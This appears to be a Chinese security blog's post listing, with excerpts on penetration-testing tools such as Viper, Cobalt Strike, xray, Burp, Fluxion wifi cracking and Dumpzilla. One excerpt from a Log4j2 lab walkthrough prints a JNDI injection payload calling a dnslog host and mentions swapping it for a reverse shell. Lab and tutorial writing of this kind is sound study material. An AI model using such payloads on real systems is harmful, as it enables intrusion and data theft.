- 博客(36)
- 资源 (24)
- 收藏
- 关注
RSS订阅
原创 win10 重启开机不显示密码输入框
华硕笔记本开机不显示密码输入框,重启也不行做电脑优化时,把电脑开机启动项里面设置为仅启动最基本的系统服务,结果重启之后就显示不了密码输入框,看网上有相关的问题但是除了重装也没有好的答案,后来自己琢磨可能是启动项的问题,就开机f8进安全模式,把启动项勾选为第一个,全部启用,问题解决。
2016-10-19 09:14:43
56486
15
原创 viper的安装使用
官方的使用说明文档ViperSec · 语雀https://www.yuque.com/vipersec1、前提是本机需要具备docker环境2、在本机先建立个viper目录3、直接复制输入配置文件,在目录下生成docker-compose.yml,注意最下面的“123456”为viper的自定义密码,后续登陆时会使用到tee docker-compose.yml <<-'EOF'version: "3"services: viper: image: regis
2022-05-28 19:34:34
3464
原创 Centos部署vulhub时所遇到的问题
官方部署文档,直接使用几条命令即可方便快捷的部署漏洞靶场环境Vulhub - Docker-Compose file for vulnerability environmenthttps://vulhub.org/#/docs/install-docker-compose/1、首先是网络问题,服务器直接使用GitHub下载因为某些原因,下载失败。使用官网文档中的docker加速器时在重启docker时出现docker启动报错[root@localhost docker]# systemctl
2022-03-07 15:09:36
1617
原创 xray与dirsearch、burpsuite、awvs之间的联动扫描
1、xray与dirsearch让dirsearch充当爬虫的角色,xray对其传入的流量进行扫描a、首先访问我们的测试网站正常b、启动xray,在浏览器中设置好代理,xray会主动扫描所点击的网页xray_windows_amd64.exe webscan --listen 10.30.20.68:7777 --html-output 2022.htmlc、因为我的dirsearch运行在kali上,所以代理中使用的IP为本机的IP地址python3 dirsearch.py
2022-03-03 18:10:11
7022
3
原创 Apache Log4j2 Vulfocus靶场环境复现
Vulfocus在线靶场免费注册免费使用。在线地址:vulfocus点击启动环境启动后访问页面显示地地址,能成功访问即完成搭建完成这里使用chrome的HackBar插件,直接使用POST协议随便传个参数上去访问hello页面直接在Body插入payload,这里使用dnslogpayload="${jndi:ldap://asr17t.dnslog.cn/exp}"成功打印出dnslog信息反弹shell替换payload即可PS:...
2021-12-12 08:39:01
3520
原创 Goby部署到服务器运行
Goby扫描器想必大家都用过,在项目上对较多的扫描任务时,会占用大量的本地资源,此刻可以把goby部署到vps上,不占用本地资源,且可以7*24在哪扫描,只需要安静等结果就可。本地VPS环境为腾讯云的ubuntu环境,首先去goby官网上下载linux版本安装包https://gobies.org/goby-linux-x64-1.8.302.ziphttps://gobies.org/goby-linux-x64-1.8.302.zip然后上传到VPS下,需要给goby-cmd-linux加.
2021-11-09 16:09:35
4388
原创 Burp Suite代理设置后出现Failed to connect to
http://www.gstatic.com/generate_204burpsuite和浏览器设置均正常设置,但是抓包时却出现莫名端口,并且域名也未知。原因在于burpsuite的user options里是否设置了上游系统代理,一般用于跟awvs、xray进行联动扫描。如果此处没有关闭,则下次抓包时就会出现无法抓包的情况。---------简单的问题在没遇到的情况下也会不简单,记录、分享、解决问题。...
2021-11-09 10:24:20
11722
原创 Docker内的nessus如何更新
1、首先将nessus的更新包上传到docker的nessus内宿主机向Docker容器传送文件docker cp 本地文件的路径 container_id:<docker容器内的路径>2、进入nessus内使用nessuscli更新,出现successful即可cd /opt/nessus/sbin./nessuscli update /root/all-2.0.tar.zip3、更新下plugin_feed_info.inc配置文件cp /root/plugi.
2021-10-08 21:14:14
1632
原创 Win7下执行powershell提示禁止执行脚本
执行任意ps脚本提示禁止执行解决方法:在左下角输入powershell,右击已管理员权限运行执行set-executionpolicy remotesigned即可后面即可正常执行ps脚本
2021-08-19 15:17:52
879
1
原创 Cobalt Strike客户端连接被拒绝
网上下的Cobalt Strike客户端在kali上部署,直接启动后,用客户端去连接提示拒绝连接服务器也是按照正常的,但是提示密码不正常./teamserver 192.168.32.139 123456这个密码错误无法得知是从何而来,因为我只是启动了服务端,并未去连接直到我打开了teamserver的配置文件,发现默认的端口由50050被改成50051我把端口号改成默认的,然后启动竟然正常了。后续再测试发现不是端口号问题,但是我的解决方法就是修改端口号...
2021-07-23 16:44:28
14435
2
原创 Python使用中遇到的问题以及解决方案,持续更新
在kali下执行pip3 install -r requirements.txt提示证书错误可以通过将pypi.org和files.pythonhosted.org设置为受信任主机,可以忽略SSL错误
2020-10-12 09:20:34
679
原创 什么叫ATT&CK模型
含义:ATT&CK模型由MITRE(一个美国非盈利组织,号称定义了网络安全)根据真实观察到的网络攻击数据提炼形成攻击矩阵模型。该模型把攻击活动抽象为初始访问(Initial Access)、执行(Execution)、持久化(Persistence)、特权提升(Privilege Escalation)、躲避防御(Defence Evasion)、凭据访问(Credential Access)、发现(Discovery)、横向移动(Lateral Movement)、收集(Collectio
2020-09-06 18:17:45
7766
原创 oh-my-zsh只恨发现太晚
而zsh的功能极其强大,只是配置过于复杂,起初只有极客才在用。后来,有个穷极无聊的程序员可能是实在看不下去广大猿友一直只能使用单调的bash, 于是他创建了一个名为oh-my-zsh的开源项目...从此后小白也只需要通过简单的配置即可享受到吊炸天的ZSH本机为腾讯云Ubuntu系统首先查看本机是否安装了zshcat /etc/shellsubuntu默认是未安装的使用一下命令进行安装apt-get install zsh切换shell安装完成后再查看是否安装成功.
2020-08-22 16:57:34
322
1
原创 PC为Win10系统,所以下列软件基本默认Win10系统的,其它系统是否支持请自己尝试
一下软件均为本人目前所安装,下载链接尽量贴官网链接,后续碰到好用的软件会继续更新---1、Traffic MonitorTraffic Monitor是一款用于Windows平台的网速监控悬浮窗软件,可以显示当前网速、CPU及内存利用率,支持嵌入到任务栏显示,支持更换皮肤、历史流量统计等功能。以前很长一段时间使用的都是火绒自带的网速小插件,但是不能更换皮肤和不能在任务栏显示,关键是不需要安装,直接打卡急用。主窗口显示效果任务栏使用效果下载地址:https://github.c
2020-07-05 10:50:21
847
1
原创 Burpsuite测试中的小技巧-1
日常测试中我们经常使用burpsuite去替换高低权限的Cookie值去测越权漏洞,手动替换Cookie在测试系统功能模块较多时比较繁琐和容易出错,可以使用burpsuite的intrude模块去实现自动替换我们鼠标所点击请求中的Cookie值,如果返回正常则存在越权(先获取低权限的Cookie值,我们鼠标去正常点击高权限账号所拥有的功能模块)。...
2020-05-21 16:43:33
2452
原创 使用Docker搭建Weblogic服务
1、首先确保本机docker服务已经启用使用命令启动docker服务systemctl docker start2、查看本机运行的docker版本号docker version3、docker服务是否正常运行systemctl status docker4、使用docker在仓库中搜索Weblogic镜像(选择statrs最高的一个安装)docker searc...
2020-04-19 19:40:41
3799
1
原创 WIN下常用快捷操作命令
分享一些常见的win系统操作命令,提高效率win+W //打开工作区win+E //打开文件资源管理器win+R //打开运行对话框win+I //打开windows设置win+P //打开投影选项win+D //返回桌面win+F //打开windows反馈中心win+G //打开Xbox提供的便捷工具截屏、录屏win+K //打开无线连接搜索win+L ...
2019-11-08 15:18:24
168
原创 telnet使用root登陆报“Login incorrect”
对于telnet中账号名和密码都正确还是会报错“Login incorrect”的情况下大部分文章都说是注释掉/etc/pam.d/login第一行但还是会报错应该修改/etc/pam.d/下的remote文件第一行[root@ pam.d]# cat remote#%PAM-1.0auth required pam_securetty.so...
2019-05-31 13:37:50
5043
4
原创 python下SimpleHTTPServer 用法
从VMware workstation虚拟机里面的linux传输文件时,除了ssh和scp、ftp常见的方法外,还有python下SimpleHTTPServer小工具也可以快捷的进行文件分析SimpleHTTPServer是Python 2自带的一个模块,是Python的Web服务器。在Python 3已经合并到http.server模块中。如果不指定端口号默认的是8000端口。在局域网中使...
2019-04-01 17:47:33
59437
1
原创 远程连接终端长时间自动断开连接解决办法10053
使用xshell连接远程服务器,时间一长自动断开连接报错:Socker error Event:32 Error:10053该操作产生的原因是在于修改了centos的安全设置解决办法:修改/etc/profile配置文件,最下方看是不是设置了超时时间,删除export TMOUT=3000保存退出即可...
2019-03-21 17:38:06
4946
原创 实现SSH免登录配置以及图解
免密码登录配置实验步骤:主机A:192.168.163.150主机B:192.168.163.155步骤:1、在主机A上生成公钥ssh-keygen -t rsa(四个回车)2、查看生成的公钥,在根目录下有个隐藏的文件夹.sshls -laid_rsa.pub是公钥文件3、把主机A的公钥文件导到主机B上,需要知道主机B的ssh密码ssh-copy...
2019-02-20 21:38:44
229
原创 虚拟机linux网卡设置地址报错终结贴
在给虚拟机里面网卡配置地址后重启网卡服务经常会遇到报错,大致有以下几种:1、没有找到合适的设备:没有找到可用于链接System eth0 的设备2、The connection is not for this device·········网上文章很多,无非就是修改配置,在我今天又遇到情况下,我决定要总结以下,避免以后再次遇到需要注意查看linux的几个文件/etc/sys...
2018-12-25 11:06:59
502
原创 Dumpzilla 的使用
浏览器会自动保存用户访问网站的各项信息,如Cookie、网址、下载记录、书签等。通过分析这些信息,可以获取使用者的诸多个人信息和行为习惯。Kali Linux提供一款火狐浏览器信息提取工具Dumpzilla。该工具适用于Firefox、Iceweasel、Seamonkey浏览器。它能提取这些浏览器中的各种隐私信息,如Cookie、用户偏好设置、下载记录、表单、浏览历史、书签、HTML5缓存、缩略...
2018-10-10 09:20:48
382
原创 centos 6.9更新python2.7到3.6
wget https://www.python.org/ftp/python/3.6.0/Python-3.6.0.tgz 下载python 3.6安装包tar -zxvf Python-3.6.0.tgz 解压cd Python-3.6.0/ 进入文件夹./configure --prefix=/usr/local/python3.6 配置报错:config...
2018-09-11 11:22:08
677
原创 centos 6.9启动软件时libstdc++.so.6 报错
这里我是在安装rar软件后解压文件时报错:error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory解决方案:因为centos的版本不一样,所以要安装的库版本也不一样。第一步:确定自己系统所需要安装的库版本号yum
2017-12-14 14:13:21
667
原创 利用Gate one和ngrok把内网中kali映射到公网,方便随时随地去使用kali进行操作
问题的起源,日常使用中会经常使用kali系统,winodws系统的话只有再装个vmware虚拟机,里面开启kali,通过ssh进行操作是挺方便的,但是电脑会占用更多资源,如果性能跟不上的情况下,会出现卡顿等等情况,很是让人不爽,如果你在出差的情况下呢,还是要开启虚拟机,费时费力,当然有人会说买个vps等等,如果你没有vps呢?这里我们介绍种很简单的情况。一台空闲的电脑,能上网,不用花一分钱就能
2017-09-05 08:58:22
7334
4
原创 Centos7 内核从3.10升级到4.12过程
近期,国家互联网应急中心漏洞(CNCERT)公告中提到Linux kernel4个拒绝服务漏洞,对应CNVD-2017-07509、CNVD-2017-07508、CNVD-2017-07507、CNVD-2017-07386)。综合利用上述漏洞,攻击者可使系统拒绝服务,且在符合一定利用条件下可能导致远程命令执行。设计到的内核版本从3.0到4.99,详细信息可以到国家互联网应急中心官网公告查看,随
2017-06-19 19:09:15
18667
3
原创 轻轻松松破解wifi,kali下fluxion的使用
环境: Kali 2016.02版本下载链接:http://mirrors.neusoft.edu.cn/kali-images/kali-2016.2/kali-linux-2016.2-amd64.isoRTL8187外置网卡 Vmware 2016 新装的kali中,要先更改一下yum源 工作原理(大体步骤) 1.扫描能够接收到的WIFI信号 2.抓取握手包(这一步的目的是为了验证
2017-01-08 14:59:24
30716
4
原创 DVWA安装后File Inclusion出现问题The PHP function allow_url_include is not enabled.
在安装DVWA来做实验环境时,在File Inclusion模块出现The PHP function allow_url_include is not enabled.这里贴出来,方便以后遇到的小伙伴们。解决问题办法,修改php.ini配置文件我的事kali上面,使用find / -name php.ini //查找路径vi XXXX/php.ini //修改配置文件在配置文
2016-12-21 10:10:08
10507
sysmon安装包包含补丁.zip
2021-08-09
计算机维修工(中级)实践考核
2018-11-15
2014年通信技能大赛平台配置方案
2018-11-13
社工学 经典文章
2017-02-08
F5算法解密 刷新
2016-08-09
F5算法解密jar
2016-08-09
由无线路由器配置文件查看密码
2016-06-28
MD5多接口免费解密工具
2016-06-28
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人